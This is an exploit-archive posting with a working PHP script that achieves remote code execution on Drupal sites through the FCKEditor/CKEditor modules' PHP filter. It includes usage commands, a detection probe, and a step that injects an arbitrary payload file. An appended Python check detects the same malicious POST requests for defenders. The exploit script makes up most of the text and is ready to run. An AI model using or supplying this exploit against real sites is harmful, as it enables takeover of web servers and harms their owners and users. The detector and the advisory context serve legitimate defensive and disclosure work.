Drupal FCKEditor/CKEditor PHP Execution

Posted Mar 24, 2012
Authored by Patroscan

Drupal FCKEditor/CKEditor module remote PHP code execution exploit.

tags | exploit, remote, php, code execution
MD5 | 9d9241613b87c0bc1d7c9664845a5980

<?php
# Exploit Title: Drupal FCKEditor/CKEditor module remote PHP execution
# Date: March 19, 2012
# Author: Patroscon
# Software Link: http://drupal.org/project/ckeditor, http://drupal.org/project/fckeditor
# Version: FCKEditor 6.x-2.2, CKEditor 6.x-1.8, CKEditor 7.x-1.6.
# Tested on: Linux, Windows
# Vendor Advisory: http://drupal.org/node/1482528


# Description
#
# It is possible to instruct the FCKEditor and CKEditor modules to pass text through a chosen filter.
# If the PHP filter module is enabled, users can choose to run this filter on chosen code.
#
# See http://drupal.org/1482528

/*
* Patroscon has RISEN!
*
* Exploits SA-CONTRIB-2012-040 (http://drupal.org/node/1482528).
*
* Required: vulnerable site must also use PHP filter module.
* Required for Drupal 6 exploit: You must have access permission listed in advisory.
*
* Point to the Drupal root.
*
* Use php patroscon.php http://example.com/ [cookie] [payloadfile]
*
* example:
*
* To check if the site can be exploited: php patroscon.php http://example.com/
* If you need a cookie: php patroscon.php http://example.com/ 'SESSa6a82714802c2c37ba16036f1faf01d4=g6TYq0r2mT8wCTQTKiYl6x2lIdRL1H21Db5CbomcKqU'
*
* It's possible to provide a filename with PHP exploit code. It will be executed when detection was successful. When you provide the payload file
* you must also provide a cookie argument. This may be a nonsense cookie.
*
* example:
*
* php patroscon.php http://example.com/ 'whatever' ./admin_sid.php
*
* Exploit code must be wrapped in <?php ?> tags. See admin_sid.php for an example.
*
*/

if (!isset($argv[1])) {
  echo "You must give URL such as http://example.com/";
  return;
}

$site = $argv[1];
$cookie = isset($argv[2]) ? $argv[2] : '';
$payloadfile = isset($argv[3]) ? $argv[3] : '';

// Menu path and POST prefix for each affected module/version.
$exploits = array(
  'fckeditor' => array(
    'path' => 'fckeditor/xss',
    'pre' => 'filters[0]=php/0&text=',
  ),
  'ckeditor v6' => array(
    'path' => 'ckeditor/xss',
    'pre' => 'filters[0]=php/0&text=',
  ),
  'ckeditor v7' => array(
    'path' => 'ckeditor/xss',
    'pre' => 'filters[0]=aaa&textformat_filters=true&input_format=php_code&text=',
  ),
);

echo "\nWorking on $site";
foreach ($exploits as $editor => $exploit) {
  echo "\n - $editor";
  $url = $site . '/?q=' . urlencode($exploit['path']);
  // Detection probe: the filter callback should echo the decoded marker string.
  $result = post($url, $exploit['pre'] . urlencode("<?php echo base64_decode('cGF0cm9zY29uIGhhcyByaXNlbg=='); ?>"), $cookie);

  switch ($result['info']['http_code']) {
    case 200:
      if ($result['content'] == 'patroscon has risen') {
        echo "\n - exploitable";
        if ($payloadfile) {
          echo "\n - injecting payload";
          $payload = file_get_contents($payloadfile);
          $result = post($url, $exploit['pre'] . urlencode($payload), $cookie);
          echo "\n\n********* Payload result [{$result['info']['http_code']}] ******************************************************************";
          echo "\n" . $result['content'];
          echo "\n********** End payload **************************************************************************";
        }
        echo "\n";
        return;
      }
      else {
        echo "\n - unable to execute PHP";
      }
      break;
    case 404:
      echo "\n - not installed";
      break;
    case 403:
      echo "\n - access denied";
      break;
    default:
      echo "\n - an unknown error occurred.";
  }
}

echo "\n";

// Send a POST with the given body and cookie; return the response body and cURL info.
function post($url, $fields, $cookie) {
  $handle = curl_init($url);
  if (!$handle) {
    return;
  }

  curl_setopt_array($handle, array(
    CURLOPT_POST => TRUE,
    CURLOPT_POSTFIELDS => $fields,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_COOKIE => $cookie,
  ));

  $result = curl_exec($handle);
  $info = curl_getinfo($handle);

  curl_close($handle);
  return array('content' => $result, 'info' => $info);
}
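
A defender-side check for the request shape the script above sends, added here as an example (it is not part of the original exploit or of the Drupal modules): it flags POSTs to the fckeditor/xss and ckeditor/xss paths that request the PHP filter or the php_code format. The function names and sample requests are constructed for illustration, and it assumes the POST body is available, for instance from a WAF or audit log.

```python
from urllib.parse import parse_qs, unquote

# Menu paths taken from the $exploits table in the script above.
EDITOR_PATHS = ("fckeditor/xss", "ckeditor/xss")


def drupal_path(request_target):
    """Return the Drupal menu path for ?q=path and clean-URL requests alike."""
    path, _, query = request_target.partition("?")
    q = parse_qs(query).get("q")
    return (q[0] if q else unquote(path)).strip("/").lower()


def inspect_request(method, request_target, body):
    """Return a list of findings for one request; an empty list means no match."""
    path = drupal_path(request_target)
    # endswith() also covers sites installed in a subdirectory.
    on_editor = any(path == p or path.endswith("/" + p) for p in EDITOR_PATHS)
    if method.upper() != "POST" or not on_editor:
        return []
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    for name, values in form.items():
        for value in values:
            v = value.strip().lower()
            # Drupal 6 variant on the page: filters[0]=php/0
            if name.startswith("filters[") and v.split("/")[0] == "php":
                findings.append("php filter requested via " + name)
            # Drupal 7 variant on the page: input_format=php_code
            if name == "input_format" and v == "php_code":
                findings.append("php_code text format requested")
    if any("<?" in text for text in form.get("text", [])):
        findings.append("PHP open tag in text parameter")
    return findings


# Constructed sample requests: (method, request target, POST body).
SAMPLES = [
    ("POST", "/?q=ckeditor%2Fxss", "filters[0]=php/0&text=%3C%3Fphp+echo+1%3B+%3F%3E"),
    ("POST", "/ckeditor/xss",
     "filters[0]=aaa&textformat_filters=true&input_format=php_code&text=hello"),
    ("POST", "/?q=ckeditor/xss", "filters[0]=filter/0&text=%3Cb%3Ehi%3C%2Fb%3E"),
    ("GET", "/node/1", ""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target, inspect_request(method, target, body))
```

Any finding on a site that has the PHP filter module enabled is worth checking against the module versions listed in the vendor advisory.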